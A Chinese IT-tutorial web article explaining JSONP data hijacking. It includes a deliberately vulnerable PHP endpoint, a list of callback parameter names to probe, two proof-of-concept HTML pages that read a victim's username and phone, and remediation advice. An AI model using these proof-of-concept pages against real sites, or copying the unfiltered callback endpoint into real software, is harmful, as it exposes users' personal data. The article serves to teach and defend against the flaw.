位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • 华为p50pro怎么设置防误触(华为p50pro怎么设置桌面时间)

    华为p50pro怎么设置防误触(华为p50pro怎么设置桌面时间)

  • 只有会议号怎么加入腾讯会议列表(只有会议号怎么添加会议列表)

    只有会议号怎么加入腾讯会议列表(只有会议号怎么添加会议列表)

  • 分栏为什么只在一边(分栏为什么有些地方还是一栏)

    分栏为什么只在一边(分栏为什么有些地方还是一栏)

  • 苹果充电器进水了还能用吗(苹果充电器进水了怎么办)

    苹果充电器进水了还能用吗(苹果充电器进水了怎么办)

  • 为什么抖音充值总是失败呢(为什么抖音充值显示服务异常)

    为什么抖音充值总是失败呢(为什么抖音充值显示服务异常)

  • 一加8怎么关机(一加8怎么关机不了)

    一加8怎么关机(一加8怎么关机不了)

  • 朋友圈删除了还是显示(朋友圈删除了还能看到之前点赞吗)

    朋友圈删除了还是显示(朋友圈删除了还能看到之前点赞吗)

  • 华为云空间通话记录同步不了(华为云空间通话录音)

    华为云空间通话记录同步不了(华为云空间通话录音)

  • 什么手机自带红外线遥控(什么手机自带红包挂)

    什么手机自带红外线遥控(什么手机自带红包挂)

  • 微信小程序无法获取位置信息(微信小程序无法连接网络)

    微信小程序无法获取位置信息(微信小程序无法连接网络)

  • 苹果8最近老是卡顿(苹果最近老是收到垃圾短信)

    苹果8最近老是卡顿(苹果最近老是收到垃圾短信)

  • 为什么酷狗音乐不显示在上面(为什么酷狗音乐下载的歌本地音乐不显示)

    为什么酷狗音乐不显示在上面(为什么酷狗音乐下载的歌本地音乐不显示)

  • 小米免提对方听不到声音(小米免提对方听不到我的声音是什么问题?)

    小米免提对方听不到声音(小米免提对方听不到我的声音是什么问题?)

  • wifi2.4ghz什么意思(wifi2.4什么意思)

    wifi2.4ghz什么意思(wifi2.4什么意思)

  • photoshop色相饱和度在哪(ps中色相饱和度怎么用)

    photoshop色相饱和度在哪(ps中色相饱和度怎么用)

  • 苹果id注销后还能重新注册吗(苹果id注销后还能弄新的id吗)

    苹果id注销后还能重新注册吗(苹果id注销后还能弄新的id吗)

  • 如何把苹果旧手机上的所有信息全部删除(如何把苹果旧手机照片导入安卓手机)

    如何把苹果旧手机上的所有信息全部删除(如何把苹果旧手机照片导入安卓手机)

  • 手机上的孔有什么用(手机上的孔分别有什么作用)

    手机上的孔有什么用(手机上的孔分别有什么作用)

  • 被淘宝店铺拉黑的表现(被淘宝店铺拉黑影响在其它店铺购买吗)

    被淘宝店铺拉黑的表现(被淘宝店铺拉黑影响在其它店铺购买吗)

  • 手机淘宝联盟怎么开通(手机淘宝联盟怎么申请推广位)

    手机淘宝联盟怎么开通(手机淘宝联盟怎么申请推广位)

  • Rthdcpl.exe是什么进程?Rthdcpl.exe是病毒吗?及如何识别Rthdcpl.exe?(rtlcpl.exe)

    Rthdcpl.exe是什么进程?Rthdcpl.exe是病毒吗?及如何识别Rthdcpl.exe?(rtlcpl.exe)

  • wait命令  等待指令执行完毕(wait等待的用法)

    wait命令 等待指令执行完毕(wait等待的用法)

  • 税务机关的义务是依法征管
  • 营改增后土地增值税应税收入的确认
  • 含税销售额换算成不含税销售额的公式是什么?
  • 收到社保局退回的社保费
  • 企业净利润怎么分配
  • 一般风险准备是留存收益吗
  • 先到发票后到商品怎么入账
  • 公司一般户需要年检吗
  • 财务汽车折旧年限的最新规定2020
  • 外地预交的附加税金在申报的时候怎么填
  • 当月费用次月收到发票
  • 新办企业能否享受留抵退税
  • 民办幼儿园提供什么服务
  • 公司水费怎么做账
  • 制造企业售后服务方案
  • 没收租赁保证金开什么内容的发票
  • 拍卖土地支付的法律依据
  • 2018年所得税表
  • 企业内部控制审计报告应当与内部控制评价报告
  • 销售不动产增值税计税依据
  • 小规模自开专票税率是1%还是3%
  • 红冲的普通发票要给对方吗
  • 最新w10系统专业版
  • win10开机选择系统%1
  • 腾讯电脑管家游戏模式
  • 经营出租固定资产折旧额计入什么科目
  • win11怎么安装CAD2008
  • 系统之家有没有官网
  • PHP:get_meta_tags()的用法_url函数
  • 收到税局退回增值税
  • 应缴纳消费税会增加吗
  • fsacder2e是什么文件夹
  • 总分账与明细账关系
  • 快递收据能否作为发票
  • 真正有效解决近视的方法
  • php运用
  • 融资租入固定资产的改建支出
  • 企业所得税法定税率是多少
  • 商家为消费者提供餐具
  • html扫码功能
  • php实现定时自动刷新
  • php执行命令的函数
  • 登记银行存款日记账的凭证有哪些
  • 运输发票计算抵扣怎么报税
  • js 自定义类型
  • 工资薪金与劳务报酬的区别有哪些
  • 电子承兑汇票贴现怎么做账
  • 业务招待费报销制度及流程
  • 长期股权投资评估增值调整
  • 其他应收款科目余额在贷方表示什么
  • 个人无需办理汇票业务
  • 行政划拨的土地有使用年限吗
  • 成本少了怎么处理
  • 购买不动产增值税率
  • 股权拍卖溢价部分怎么算
  • 发票打印机格式不对
  • 外商投资企业开什么发票
  • 小企业会计准则2023电子版
  • 企业预付账款的分录
  • mac怎么使用自动切换输入法
  • Windows 7 64位系统手动添加Editplus到鼠标右键的方法
  • 潘 pan
  • macbook怎么把通知关掉
  • 电脑显示无windows
  • dos批处理教程
  • js原型面试题
  • javascript对象的属性和方法
  • jquery的validate前端表单验证
  • 开发流程和步骤
  • 数据库并发操作主要解决哪三个问题,基本方法是什么
  • jquery打开本地html
  • node.js的express
  • 安卓手机与电脑连接方法
  • First Class: UI of Android
  • 河北省国家税务局电子税务局登录
  • 税务疑点核查报告
  • 从香港回内地需要做核酸检测吗
  • 税务注销相关文件
  • 山东省梁山县属于什么市?
  • 开原航天医院官网
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设